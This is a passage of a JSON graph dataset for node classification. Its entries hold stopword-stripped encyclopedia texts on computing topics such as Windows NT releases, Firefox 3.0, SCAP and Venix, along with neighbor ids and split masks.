      607,
      11363,
      6760,
      9320,
      8316,
      640,
      6787,
      132,
      4745,
      671,
      7848,
      3241,
      684,
      3248,
      1718,
      10436,
      9927,
      8395,
      210,
      6361,
      6369,
      9444,
      9452,
      11501,
      2301,
      11013,
      780,
      6412,
      787,
      5397,
      1304,
      8991,
      1316,
      7460,
      4908,
      6445,
      1839,
      7983,
      823,
      9027,
      850,
      8020,
      11608,
      346,
      873,
      5492,
      2424,
      7552,
      5506,
      1927,
      11145,
      7566,
      414,
      3487,
      3488,
      5534,
      6049,
      5036,
      10156,
      11184,
      1971,
      2995,
      9141,
      9151,
      9153,
      11221,
      470,
      10202,
      3551,
      6624,
      1508,
      4076,
      2545,
      6129,
      499,
      2035
    ],
    "mask": "Test"
  },
  {
    "node_id": 634,
    "label": 2,
    "text": "Base_and_bounds:base bounds computing base bounds refers simple form virtual memory access computer memory controlled one small number sets processor registers called base bounds registers simplest form user process assigned single contiguous segment main memory operating system loads physical address segment base register size bound register virtual addresses seen program added contents base register generate physical address address checked contents bounds register prevent process accessing memory beyond assigned segment operating system constrained hardware access physical memory technique protects memory used one process access modification another protect memory erroneous access owning process also allows programs easily relocated memory since base bounds registers modified program moved computer systems extended mechanism multiple segments bank bank instructions data univac 1100 series computers separation memory dec pdp-10 system read/write low segment user process read-only high segment sharable code segmented virtual memory generalization mechanism large number segments usually segment table kept memory rather registers",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      541,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      2625,
      6730,
      6221,
      86,
      10333,
      97,
      2152,
      8298,
      7285,
      3702,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      10883,
      4747,
      6797,
      9366,
      6296,
      7325,
      9887,
      3248,
      6837,
      8388,
      9932,
      5840,
      6868,
      7382,
      8410,
      1247,
      1253,
      5363,
      2811,
      2304,
      10499,
      1804,
      273,
      9490,
      11539,
      8474,
      3871,
      10016,
      2345,
      7983,
      11059,
      823,
      4409,
      7483,
      11075,
      4423,
      4424,
      5457,
      11601,
      10590,
      8545,
      8551,
      5492,
      7039,
      1922,
      394,
      3978,
      5008,
      7057,
      11667,
      8092,
      1954,
      421,
      11184,
      3512,
      6075,
      6078,
      9151,
      1474,
      8136,
      5065,
      5074,
      5080,
      6128,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 635,
    "label": 4,
    "text": "Security_Content_Automation_Protocol:security content automation protocol security content automation protocol scap method using specific standards enable automated vulnerability management measurement policy compliance evaluation systems deployed organization including e.g. fisma compliance national vulnerability database nvd u.s. government content repository scap example implementation scap openscap guard security threats organizations need continuously monitor computer systems applications deployed incorporate security upgrades software deploy updates configurations security content automation protocol scap pronounced ess-cap comprises number open standards widely used enumerate software flaws configuration issues related security applications conduct security monitoring use standards measuring systems find vulnerabilities offer methods score findings order evaluate possible impact scap suite specifications standardize nomenclature formats used automated vulnerability management measurement policy compliance products vendor computer system configuration scanner get product validated scap demonstrating interoperate scanners express scan results standardized way scap defines following standards referred scap 'components combined starting scap version 1.0 july 2010 starting scap version 1.1 february 2011 starting scap version 1.2 september 2011 security content automation protocol scap checklists standardize enable automation linkage computer security configurations nist special publication 800-53 sp 800-53 controls framework current version scap meant perform initial measurement continuous monitoring security settings corresponding sp 800-53 controls future versions likely standardize enable automation implementing changing security settings corresponding sp 800-53 controls way scap contributes implementation assessment monitoring steps nist risk management framework accordingly scap forms integral part nist fisma implementation project scap validation program tests ability products employ scap standards nist national voluntary laboratory accreditation program nvlap accredits independent laboratories program perform scap validations vendor seeking validation product contact nvlap accredited scap validation laboratory assistance validation process customer subject fisma requirements wants use security products tested validated scap standard independent third party laboratory visit scap validated products web page verify status product considered",
    "neighbors": [
      11329,
      678,
      6282,
      7467,
      575,
      3503,
      6224,
      4820,
      2709,
      5780,
      1567
    ],
    "mask": "None"
  },
  {
    "node_id": 636,
    "label": 3,
    "text": "Windows_NT_3.5:windows nt 3.5 windows nt 3.5 operating system developed microsoft released september 21 1994 second release windows nt one primary goals windows nt 3.5 development improve operating system performance result project codenamed daytona daytona international speedway daytona beach florida.. like many older windows versions 1996 microsoft stopped supporting windows nt 3.5 december 31 2001 support windows nt 3.51 workstation also ended date windows nt 3.5 comes two editions nt workstation nt server respectively replace nt nt advanced server editions windows nt 3.1 workstation edition allows 10 concurrent clients access file server support mac clients windows nt 3.5 includes integrated winsock tcp/ip support predecessor windows nt 3.1 includes incomplete implementation tcp/ip based unix system v streams api tcp/ip ipx/spx stacks windows nt 3.5 rewritten netbios tcp/ip netbt support compatibility layer tcp/ip introduced also microsoft dhcp wins clients dhcp wins servers windows nt 3.5 share files via file transfer protocol printers line printer daemon protocol act gopher http wais server ref name= tcp/ip windows nt 3.5 /ref includes remote access service remote dial-up modem access lan services using either slip ppp protocols windows nt 3.5 resource kit includes first implementation microsoft dns new features windows nt 3.5 include long filenames 255 characters object linking embedding ole version 2.0 support input/output completion ports microsoft updated graphical user interface would consistent windows workgroups 3.11 nt 3.5 shows performance improvements nt 3.1 requires less memory lack drivers pcmcia cards limited nt 3.5 suitability notebook computers install windows nt 3.5 computer sixth-generation later x86 processor one modify files installation cd-rom july 1995 windows nt 3.5 service pack 3 rated national security agency complying trusted computer system evaluation criteria tcsec c2 criteria",
    "neighbors": [
      1030,
      6150,
      10257,
      11283,
      9762,
      11301,
      6697,
      1581,
      7234,
      582,
      3142,
      1098,
      8275,
      8798,
      10338,
      8296,
      5225,
      8299,
      9840,
      7796,
      3191,
      6265,
      8315,
      639,
      641,
      2179,
      651,
      6797,
      10896,
      2196,
      7847,
      8360,
      3250,
      9910,
      7364,
      10957,
      7887,
      3289,
      4316,
      9448,
      4333,
      10989,
      8432,
      5363,
      5380,
      8976,
      3857,
      6441,
      10029,
      7983,
      3890,
      6462,
      321,
      11605,
      2391,
      11103,
      2919,
      8576,
      3463,
      8080,
      7057,
      3477,
      4505,
      4515,
      3496,
      2476,
      11184,
      2995,
      7615,
      7106,
      4051,
      9173,
      5600,
      4067,
      4074,
      5103,
      499
    ],
    "mask": "Test"
  },
  {
    "node_id": 637,
    "label": 5,
    "text": "Firefox_3.0:firefox 3.0 mozilla firefox 3.0 version firefox web browser released june 17 2008 mozilla corporation firefox 3.0 uses version 1.9 gecko layout engine displaying web pages version fixes many bugs improves standards compliance implements many new web apis compared firefox 2.0 new features include redesigned download manager new places system storing bookmarks history separate themes different operating systems firefox 3.0 8 million unique downloads day released july 2008 held 5.6 recorded usage share web browsers estimates firefox 3.0 global market share generally range 4–5 dropped users migrated firefox 3.5 later firefox 3.6 partially result mid-december 2009 end january 2010 firefox 3.5 popular browser counting individual browser versions passing internet explorer 7 mozilla ended support firefox 3 march 30 2010 release 3.0.19 firefox 3.0 developed codename gran paradiso like firefox codenames name actual place case seventh-highest mountain graian alps first came idea planning began october 2006 development team asked users submit feature requests wished included firefox 3 mozilla foundation released first beta november 19 2007 second beta december 18 2007 third beta february 12 2008 fourth beta march 10 2008 fifth final beta april 2 2008 first release candidate announced may 16 2008 followed second release candidate june 4 2008 third differing second release candidate corrected serious bug mac users june 11 2008 mozilla shipped final release june 17 2008 release date firefox 3 featured popular culture mentioned colbert report among others one big changes firefox 3 implementation gecko 1.9 updated layout engine new version fixes many bugs improves standard compliance implements new web apis particular makes firefox 3 first official release mozilla browser pass acid2 test standards-compliance test web-page rendering also receives better score acid3 test firefox 2 new features defined whatwg html 5 specification support web-based protocol handlers native implementation codice_1 method support safe message-passing codice_2 support offline web applications new features include apng support exslt support new internal memory allocator jemalloc used rather default libc one gecko 1.9 uses cairo graphics backend allowing improved graphics performance better consistency look feel various operating systems cairo lack support windows 95 windows 98 windows windows nt versions 4.0 microsoft ended support windows 98 windows july 11 2006 firefox 3 run operating systems similarly mac version firefox 3 runs mac os x 10.4 higher unlike previous versions native cocoa widget interface frontend changes firefox features redesigned download manager built-in search ability resume downloads also new plug-in manager included add-ons window extensions installed package manager microformats supported use software understand use documents store data machine-readable form password manager firefox 3 asks user would like remember password login attempt rather users able avoid storing incorrect password password manager bad login attempt firefox 3 uses places system storing bookmarks history sqlite backend new system stores information user history bookmarks particular letting user tag pages also used implement improved frecency-based algorithm new location bar auto-complete feature dubbed awesomebar mac version firefox 3 supports growl notifications mac os x spell checker aqua-style form controls give browser native look feel different operating systems firefox 3 uses separate themes mac os x linux windows xp windows vista running gnome firefox 3 displays icons environment thus desktop environment icon theme changes firefox follows suit additional icons also made used appropriate icon exists made following tango desktop project guidelines additionally gtk version replaced non-native tab bar implemented firefox 2.0 instead uses native gtk+ tab style default icons icon layout firefox 3 also changed dramatically taking keyhole shape forward back buttons default two three platforms however keyhole shape take effect linux small-icon mode iconfactory created icons microsoft windows platform addition separate icons sets displayed windows xp vista breakpad previously called airbag open-source crash reporter utility replaced proprietary talkback developed google mozilla used firefox thunderbird product significant first open source multi-platform crash reporting system development breakpad first included may 27 2007 firefox 3 trunk builds windows nt mac os x weeks later linux breakpad replaced talkback also known quality feedback agent crash reporter used mozilla software report crashes products centralized server aggregation case-by-case analysis talkback proprietary software licensed mozilla corporation supportsoft net applications noted use firefox 3 beta rapidly increased usage share 0.62 may 2008 interpreted increase mean firefox 3 betas stable users using primary browser within 24 hours release firefox 3.0 usage rose 1 3 according net applications reached peak 21.17 april 2009 declining users switched firefox 3.5 later firefox 3.6 official date launch firefox 3 june 17 2008 named download day 2008 firefox aiming set record software downloads 24 hours download day officially started 11:16 a.m. pdt 18:16 utc june 17 announced date download day june 18 time zones greater gmt +6 includes half asia oceania large number users attempting access mozilla website june 17 caused become unavailable least hours attempts upgrading new version resulted server timeouts site updated download firefox 3 12:00 pdt 19:00 utc two hours later originally scheduled download day ended 11:16 pdt 18:16 utc june 18 8,249,092 unique downloads recorded july 2 mozilla announced record 8,002,530 unique downloads parties 25 countries july 7 2008 31 million people downloaded firefox 3 gareth deaves records manager guinness world records complimented mozilla saying mobilizing 8 million internet users within 24 hours extremely impressive accomplishment would like congratulate mozilla community hard work dedication firefox 3 runs windows 2000 later windows 98 third-party kernel extender installed new functionality location bar dubbed awesomebar overall well received like due user interface performance changes much extensions made revert firefox 3 received cnet editors choice june 2008",
    "neighbors": [
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      4661,
      3639,
      9275,
      64,
      9281,
      5707,
      10834,
      6231,
      8281,
      2139,
      6747,
      1642,
      9834,
      10860,
      8303,
      115,
      9843,
      3191,
      119,
      4728,
      637,
      1664,
      6791,
      6797,
      11418,
      10910,
      8351,
      7340,
      1713,
      3250,
      9908,
      7861,
      11449,
      4797,
      7364,
      11466,
      7885,
      7889,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      8443,
      7943,
      1295,
      1807,
      7951,
      8976,
      2836,
      3350,
      10006,
      7965,
      1834,
      7983,
      823,
      5435,
      10057,
      10060,
      2893,
      10078,
      11112,
      8557,
      7543,
      3961,
      6528,
      3971,
      3462,
      8584,
      6028,
      7572,
      5026,
      1960,
      5546,
      7101,
      5054,
      10174,
      9152,
      5067,
      4048,
      5078,
      482,
      10722,
      5605,
      487,
      8169,
      5612,
      494,
      1520,
      7152,
      6133,
      5114,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 638,
    "label": 3,
    "text": "ARM_Cortex-A5:arm cortex-a5 arm cortex-a5 32-bit processor core licensed arm holdings implementing armv7-a architecture announced 2009 cortex-a5 intended replace arm9 arm11 cores use low-end devices cortex-a5 offers features armv7 architecture focusing internet applications e.g vfpv4 neon advanced simd key features cortex-a5 core several system-on-chips soc implemented cortex-a5 core including",
    "neighbors": [
      3586,
      8196,
      5645,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      630,
      10361,
      644,
      9863,
      8842,
      7820,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      6926,
      2838,
      5417,
      2862,
      7988,
      11062,
      6971,
      6978,
      8003,
      10562,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      9092,
      392,
      398,
      1428,
      4508,
      5028,
      7077,
      9638,
      1461,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      3547,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 639,
    "label": 3,
    "text": "Windows_NT_3.1:windows nt 3.1 windows nt 3.1 operating system produced microsoft part windows nt family operating systems released july 27 1993 time windows nt release microsoft windows 3.1 desktop environment established brand recognition market share windows 3.1 relied dos operating system essential functions constrictive 16-bit architecture windows nt however complete 32-bit operating system retained desktop environment familiar windows 3.1 users extending windows brand beginning windows nt version 3.1 microsoft implied consumers expect familiar user experience name windows nt new technology advertised re-engineered version windows windows nt began rewrite os/2 operating system microsoft co-developed ibm 1980s several reasons including market success windows 3.0 1990 microsoft decided advance windows rather os/2 relinquished os/2 development responsibilities ibm forked work os/2 v3.0 competing operating system windows nt 3.1 available two editions windows nt 3.1 workstations windows nt 3.1 advanced server servers premiered sales limited high system requirements general lack 32-bit applications take advantage os data processing capabilities microsoft major foothold personal computer market due use ms-dos de facto operating system ibm pc compatibles nathan myhrvold joined microsoft acquisition dynamical systems research identified two major threats microsoft monopoly—the risc architecture proved powerful equivalent intel processors ms-dos ran unix family cross-platform multitasking operating systems support multiprocessing networking widespread use unix hindered need adapt programs individual variant bill gates believed combination unix-like operating system risc processors could market threat prompting need microsoft develop unix killer could run multiple architectures gates hired dave cutler digital equipment corporation assist developing new operating system cutler left company series conflicts surrounding work prism architecture microkernel operating system mica agreed join microsoft condition able bring number staff members team dec cutler arrived microsoft october 31 1988 work future operating system started november operating system first developed revised version os/2 operating system microsoft jointly developed ibm os/2 originally intended succeed ms-dos yet commercially successful os designed could ported different processor platforms support multiprocessor systems operating systems time target enterprise market os also support networking posix standard security platform compliant orange book standards would require os multi-user system permission framework ability audit security-related events microsoft ibm wanted market operating system appealed corporate enterprise software customers meant greater security reliability processing power computer networking features however since microsoft also wanted capture market share unix computing platforms needed system design portable os/2 end microsoft began developing testing new operating system non-x86 processor emulated version intel i860 alluding chip codename n10 microsoft codenamed operating system nt os/2 dec preemptively sued microsoft alleging stole code mica use new operating system out-of-court settlement microsoft agreed make nt os/2 compatible dec alpha processor development team originally estimated development would complete within 18 months april 1989 nt os/2 kernel could run inside i860 emulator however development team later determined i860 unsuitable project december begun porting nt os/2 mips r3000 processor instead completed task three months senior microsoft executive paul maritz targeting release date 1992 development schedule uncertain company eager silence naysayers speculated nt would n't market 1994 planned present new os comdex 1990 may 1990 microsoft released windows 3.0 new version ms-dos-based windows desktop environment windows 3.0 sold well resulting shift microsoft marketing strategy eroded partnership ibm—who wanted microsoft concentrate solely developing os/2 primary platform opposed building future business around windows users developers unsure whether adopt windows os/2 due uncertainties situation magnified fact operating systems incompatible api level microsoft resources also drained simultaneous development multiple operating systems august 1990 response popularity windows 3.0 nt os/2 team decided re-work operating system use extended 32-bit port windows api known win32 win32 maintained familiar structure 16-bit apis used windows would allow developers easily adapt software new platform maintaining level compatibility existing software windows shift windows-like architecture operating system shell also changed os/2 presentation manager windows program manager due changes nt presented comdex 1990 originally planned neither general public ibm knew transformation nt os/2 windows nt time although companies agree revised partnership ibm microsoft would alternate developing major versions os/2 instead collaborating version ibm eventually learned microsoft windows nt plans january 1991 immediately ended os/2 partnership ibm would solely develop os/2 2.0 planned amended version future versions without involvement microsoft october 1991 windows nt received first public demonstration comdex effort ensure software taking advantage windows nt available upon release scheduled late-1992 microsoft also distributed 32-bit software development kit selected developers attendance demonstration positively received pc magazine called windows nt modern reinvention operating system time claimed unlikely promised backward compatibility would kept final release march 1992 microsoft also released win32s would allow windows 3.1 partial compatibility windows nt programs purposes developing software optimized platform microsoft win32 professional developers conference june 1992 windows nt demonstrated running x86 mips processors beta version windows nt updated development kit also made available concurrently microsoft announced new version sql server product windows nt unix vendors feared software could killer app would affect market share unix systems concerns also raised nt memory usage computers era shipped 4 megabytes ram 16 mb recommended nts due high cost ram time critics thought high system requirements could affect sales adoption windows nt steps taken reduce memory usage methods paging microsoft began releasing public beta builds nt october 1992 month later comdex presentation focusing third-party software windows nt held final pre-release version nt released march 1993 alongside unveiling server version windows nt lan manager although stability performance improved still fears os could released unfinished state delayed 1993 windows nt 3.1 windows nt 3.1 advanced server numbered associate windows 3.1 released july 26 1993 first x86 mips versions shipped dec alpha version followed september microsoft sold workstation version 495 server version 1,495 ostensibly server price meant promotional discount offered first six months sale never raised retail price listed one— 2,995 250 programmers wrote 5.6 million lines code development cost 150 million last year development team fixed 30,000 bugs product lifecycle microsoft published three service packs service pack 1 released october 8 1993 service pack 2 followed january 24 1994 service pack 3 release date october 29 1994 service packs distributed cd-rom floppy disk also bulletin board systems compuserve internet microsoft terminated support operating system december 31 2000 windows nt 3.1 localized various languages besides english available dutch french german japanese spanish swedish workstation server available danish finnish italian norwegian portuguese cutler set three main goals windows nt first goal portability contrast previous operating systems strongly tied one architecture windows nt able operate multiple architectures meet goal operating systems including operating system core written c programming language planning phase clear would cause windows nt higher memory consumption previous operating systems besides graphics system parts networking system written c++ parts operating systems required direct hardware access performance critical functions written assembly language parts isolated could easily rewritten porting operating system new architecture second goal reliability system longer crash due faulty application faulty hardware way operating system made attractive critical applications meet goal architecture windows nt designed operating system core isolated applications could access directly kernel designed microkernel components core run atop kernel modular fashion cutler knew principle work digital reliability also includes security operating system able resist external attacks mainframes already system every user account assigned specific rights administrator way users could prevented access confidential documents virtual memory management designed thwart attacks malware prevent users accessing foreign areas memory third goal called personality operating system able run applications designed various operating systems windows ms-dos os/2 applications mach kernel followed similar concept moving apis components operated user mode applications could changed new ones could added principle applied windows nt despite goals performance operating system optimized possible adapting critical sections code fast execution speed improve networking performance large parts networking system moved operating system core windows nt designed networking operating system branch novell lead product netware mostly lack competition microsoft failed develop product could challenge netware lead cutler hoped gain additional customers reliable networking operating system bill gates already dominated market desktop operating systems ms-dos windows hoped networking market windows nt especially hoped find market emerging number servers time expect success desktop market 1995 therefore windows nt positioned high-end operating system interview product manager david thacher designed replace windows 3.1 completely rather supplement microsoft product palette operating system critical applications expectations 10 20 among windows sales market share 10 high end market amounted one million copies windows nt 3.1 uses graphical user interface windows 3.1 developed anew operating system dos-based independent 32-bit operating system many concepts taken cutler previous operating system vms architecture windows nt takes ideas client-server model like modular structure communication modules system resources like memory files devices viewed objects operating system accessed way handles way secured unauthorized access operating system designed multiprocessor systems supports preemptive multitasking make use threads run multiple processes parallel using symmetric multiprocessing processing usage evenly distributed among available processors inter-process communication windows nt 3.1 designed around networks two newly introduced functions remote procedure call rpc network dde extension dynamic data exchange dde facilitate access data exchange processes running different computers inside network operating system designed combine certain elements monolithic kernel microkernel nowadays often referred hybrid kernel hardware abstraction layer represents lowermost layer isolates operating system underlying hardware make easy port operating system platforms kernel running atop basic functions like interrupt management processor synchronization functions operating system core handled modules operate independently one another swapped without affecting rest operating system positioned operating system core subsystems two types subsystems one integral subsystems perform important operating system functions one subsystem security subsystem handles logon process monitors security system type subsystem environment subsystem exposes operating system functions applications via application programming interfaces base subsystem 32-bit subsystem runs 32-bit applications written windows nt windows nt applications run one platform must recompiled every platform 32-bit subsystem also contains output functions including graphics device interface gdi subsystems call 32-bit subsystem able output text graphics subsystems contained windows nt 3.1 posix subsystem supports posix-compatible applications built windows nt x86 version os/2 subsystem allows command-line based os/2 1.x applications run virtual dos machine vdm sometimes also viewed subsystem strictly speaking normal 32-bit windows application manages applications originally built dos built top windows windows wow allows applications built 16-bit windows operating systems like windows 3.1 run x86 computers virtual dos machine uses virtual 8086 mode run dos applications directly risc computers emulator licensed insignia solutions used emulates 80286 processor however dos 16-bit windows applications run windows nt 3.1 due various limitations one inability applications directly access hardware well vxd files sometimes needed applications used windows nt 3.1 pure dos applications run separate memory spaces 16-bit windows applications share one memory space done due compatibility reasons applications depend ability like schedule+ microsoft mail also means 16-bit windows applications run cooperative multitasking faulty 16-bit windows application way able cause 16-bit windows applications windows nt crash windows nt 3.1 provides boot manager called ntldr loaded startup process operating system x86-based computers allows multiboot setup multiple instances windows nt 3.1 well ms-dos os/2 1.x ntldr used risc versions risc computers firmware provides boot manager every user log computer windows nt 3.1 booted pressing key combination ctrl+alt+del entering user name password users user account user-specific settings like program manager groups stored separately every user users assigned specific rights like right change system time right shut computer facilitate management user accounts also possible group multiple user accounts assign rights groups users windows nt 3.1 introduced new ntfs file system new file system robust hardware failures allows assignment read write rights users groups file system level ntfs supports long file names features accommodate posix applications like hard links compatibility reasons windows nt 3.1 also supports fat16 well os/2 file system hpfs designed networking operating system windows nt 3.1 supports multiple network protocols besides ipx/spx netbeui tcp/ip protocol supported allowing access internet similar windows workgroups files printers shared access rights configuration resources edited network network printer installed required drivers automatically transferred network removing need manually install drivers every computer remote access service ras allows client outside network connect network using modem isdn x.25 access resources workstation allows one ras connection time server supports 64 windows nt 3.1 supports then-new unicode standard character set allows multiple languages displayed facilitates localization operating system strings well file folder names internally processed unicode included programs like file manager unicode aware folders containing unicode characters accessed demonstration purposes unicode typeface called lucida sans unicode shipped windows nt 3.1 even though installed default previous code pages still supported compatibility purposes windows registry introduced windows nt 3.1 central hierarchical configuration database designed allow configuration computers network replace commonly-used text-based configuration files like ini files autoexec.bat config.sys using undocumented registry editor windows registry viewed edited user advanced server designed manage workstation computers function domain controller users groups well rights stored way user log computer network users managed centrally server trust relationships built domains able exchange data cross-domain using replication service files like logon scripts synchronized across computers network advanced server supports appletalk protocol allow connections macintosh computers hard drives combined raids windows nt 3.1 advanced server supported configurations raid 0 raid 1 raid 5 windows nt 3.1 part comes 32-bit versions components featured windows 3.1 windows workgroups however also included applications specifically aimed needs windows nt like user manager performance monitor disk administrator event viewer backup application advanced server contained server-specific administration tools windows nt 3.1 dos-based new 32-bit command-line processor called cmd.exe included compatible ms-dos 5.0 compatibility reasons windows nt 3.1 shipped 16-bit applications like microsoft write edlin windows nt 3.1 all-new operating system previous drivers could used includes wealth drivers various common components peripherals includes common scsi devices like hard drives cd-rom drives tape drives image scanners well isa devices like graphics cards sound cards network cards pci bus however expressly supported windows nt 3.1 supports uninterruptible power supply windows nt 3.1 could installed either using cd-rom provided boot disk utilizing set twenty-two 3.5 floppies twenty-three floppies advanced server windows nt 3.1 could also installed network coupon included made possible order set twenty-seven 5.25 floppies twenty-eight floppies advanced server compared floppies cd-rom contained additional drivers applications windows nt 3.1 supports multiple platforms aside x86 architecture runs computers dec alpha mips r4000 r4400 processors minimum system requirements x86 systems include 25 mhz 80386 processor least 12 megabytes memory 75 megabytes hard drive space vga graphics card risc systems require 16 megabytes memory 92 megabytes hard drive space cd-rom drive advanced server edition requires 80386 processor 16 megabytes memory 90 megabytes hard drive space risc systems 110 megabytes hard drive space needed windows nt 3.1 supports dual processor systems advanced server edition supports four processors due error processor detection routine windows nt 3.1 installed pentium ii newer processors microsoft never fixed problem unofficial patches available windows nt 3.1 sold 300,000 copies first year hardware requirements deemed high time recommended system requirements 486 processor 16 megabytes memory well average computer configuration operating system turned slow use 32-bit applications could used capabilities windows nt 3.1 scarce users resort old 16-bit applications however ran slower windows 3.1 estimates november 1993 counted 150 windows nt applications common types software like office suites available windows nt 3.1 development operating system api calls changed 32-bit applications built 1992 pre-release version windows nt 3.1 could run final version affected even software like microsoft visual c++ 1.0 risc systems windows nt 3.1 even bigger disadvantage even though powerful x86 systems almost 32-bit applications drivers ported platforms 16-bit applications ran much slower risc systems 80286 emulation compared x86 systems could run 16-bit applications natively dos 16-bit applications depended 386 calls could run risc systems however reception negative multitasking capabilities operating system rated positively especially compared windows 3.1 compared size operating system installation turned easy even though installing floppies time-consuming task advanced server intended successor unsuccessful lan manager product technically much superior predecessor failed gain success shared problems workstation pendant low performance running 16-bit applications advanced server provided financial advantage large networks price dependent number clients unlike competitor novell netware windows nt microsoft entered market could previously address mostly dominated unix novell netware os/2 test performed infoworld magazine november 1993 networking capabilities several operating systems tested showed windows nt 3.1 seriously lacking inter-client communication could connect server via netbeui attempts connect unix netware os/2 failed client software available advanced server client macintosh limited os/2 able connect server even though operating system actual success moderate huge lasting impact developers unix derivations first time strived standardize operating systems novell concerned market share bought unix vendor manufacturers microprocessors hoped use portability new operating system increase sales thus ports windows nt announced various platforms like sun sparc architecture clipper architecture recognized windows nt would dominate desktop market soon hardware became powerful enough run operating system acceptable speed eight years later microsoft would unify consumer-oriented windows line remained ms-dos based nt line october 2001 release windows xp—the first consumer-oriented version windows use nt architecture notes references",
    "neighbors": [
      6150,
      6675,
      7187,
      11283,
      1049,
      8740,
      11301,
      6697,
      1581,
      7234,
      582,
      3142,
      1098,
      6730,
      9813,
      8798,
      1121,
      10338,
      8296,
      5225,
      6250,
      8299,
      6252,
      3181,
      7796,
      6265,
      5754,
      8315,
      636,
      9340,
      641,
      2179,
      651,
      6797,
      10896,
      2193,
      2196,
      7325,
      3235,
      7847,
      2221,
      5293,
      9391,
      3250,
      9910,
      6846,
      10957,
      4815,
      5840,
      3289,
      4316,
      4836,
      9448,
      4331,
      10989,
      3314,
      5363,
      757,
      5368,
      3323,
      5380,
      3856,
      3857,
      8976,
      11539,
      3350,
      11030,
      3368,
      2345,
      6441,
      7983,
      3890,
      1844,
      7483,
      6462,
      7486,
      321,
      6984,
      2383,
      5457,
      11605,
      2391,
      7515,
      2399,
      11103,
      2919,
      5492,
      1399,
      8576,
      3463,
      5000,
      8080,
      7057,
      11667,
      3477,
      4505,
      10654,
      929,
      4515,
      3496,
      8625,
      7615,
      7106,
      3014,
      9166,
      4051,
      9173,
      1501,
      477,
      5600,
      4067,
      4074,
      4075,
      5612,
      9194,
      5103,
      7663,
      6129,
      499,
      2045,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 640,
    "label": 2,
    "text": "Venix:venix venix discontinued version unix operating system low-end computers developed venturcom company specialises skinniest implementations unix working version venix/86 ibm pc xt demoed comdex may 1983 based version 7 unix enhancements bsd notably vi csh custom inter-process communication mechanisms first licensed unix operating system available ibm pc compatibles supported read/write access separate dos/fat-partition could run little 128k bytes 256k 512k recommended september 1984 venix/86 encore released supported number early pc-compatibles including 6300 zenith 150 first ncr pc texas instruments professional pc venix encore became venix 2.0 still based version 7 unix ran dec rainbow 100 venix/86r well pcs venix/86 /286 system contained number enhancements notably tools access ms-dos files directly dos/fat-partition updated adb debugger system came two flavors 2-user version priced 800 8-user version 1,000 technical differences two confusingly venix 2.0 dec pro-380 microcomputer venix/pro based essentially system iii longer ran pro350 made clear ckermit 4e build instructions special target pro running venix 1.0 instructs user use codice_1 target pro running venix 2.0 sources also make clear venix enhanced tty interface relative pure v7 unix system venix 2.1 released least pc like original venix/86 included c compiler basic interpreter added fortran 77 compiler option optional driver kit made possible develop hardware drivers system generate new kernels november 1985 unisource software corp. venix retailer announced availability rm/cobol venix version 3.0 venix based system v. real-time version based system v.3.2 released 386 1990 last version venix 4.2.1 based unix system v release 4.2 unixware released 1994 workstation system included real-time operating system nfs tcp/ip networking x openlook motif guis veritas journaling file system vxfs development system included additionally ansi c compiler library real-time functions gui development software real-time development utilities selected industrial i/o device drivers 1984 review pc magazine found venix functional despite bugs initial versions use bios accessing devices made portable competitor pc/ix slowed display processing disk access speed found similar byte stated venix dec professional ibm pc performed adequately criticized limit background processes",
    "neighbors": [
      6787,
      6412,
      6675,
      5397,
      9366,
      1304,
      3487,
      7460,
      3241,
      7983,
      3248,
      563,
      2995,
      9141,
      823,
      9784,
      9151,
      10436,
      2378,
      9166,
      6369,
      9444,
      10085,
      8553,
      1515,
      5492,
      2424,
      633,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 641,
    "label": 3,
    "text": "Windows_NT_3.51:windows nt 3.51 windows nt 3.51 third release microsoft windows nt line operating systems released 30 may 1995 nine months release windows nt 3.5 three months release windows 95 release provided two notable feature improvements firstly nt 3.51 first short-lived outing microsoft windows powerpc architecture second significant enhancement offered release provides client/server support inter-operating windows 95 released three months nt 3.51 windows nt 4.0 became successor year later support nt 3.51 ended 2001 2002 workstation server editions respectively release windows nt 3.51 dubbed powerpc release microsoft original intention release powerpc edition nt 3.5 according microsoft david thompson basically sat around 9 months fixing bugs waited ibm finish power pc hardware editions nt 3.51 also released x86 mips alpha architectures new features introduced windows nt 3.51 include pcmcia support ntfs file compression replaceable winlogon gina 3d support opengl persistent ip routes using tcp/ip automatic display textual descriptions mouse pointer placed toolbar buttons tooltips support windows 95 common controls view significant difference kernel base windows nt 3.51 readily able run large number win32 applications designed windows 95 recent 32-bit applications work developers prevented application working windows version earlier windows 98 also applications work properly older windows nt 3.51 interface despite microsoft application releases muddied issue releasing 32-bit versions microsoft office right office 97 last version microsoft office supported nt 3.51 relying upon 16-bit versions internet explorer technology probably 32-bit versions internet explorer 4.0 later integrated windows 95 desktop nt 3.51 still used windows 3.1 desktop thereafter ie 5.0 later 5.x versions offered however open-source seamonkey internet suite supported nt 3.51 version 1.1.19 released 16 march 2010 requires manual file updates work without compromising browsing security windows nt 3.51 last series compatible intel 80386 processor 26 may 1995 microsoft released test version shell refresh named shell technology preview often referred informally newshell first incarnation modern windows gui taskbar start menu designed replace windows 3.x program manager/file manager based shell windows explorer-based graphical user interface release provided capabilities quite similar windows chicago codename windows 95 shell late beta phases however intended nothing test release second public release shell technology preview called shell technology preview update made available msdn compuserve users 8 august 1995 releases held windows explorer builds 3.51.1053.1 preview program provided early feedback shell update release next major windows nt version new interface built-in released july 1996 windows nt 4.0 five service packs released nt 3.51 introduced bug fixes new features service pack 5 example 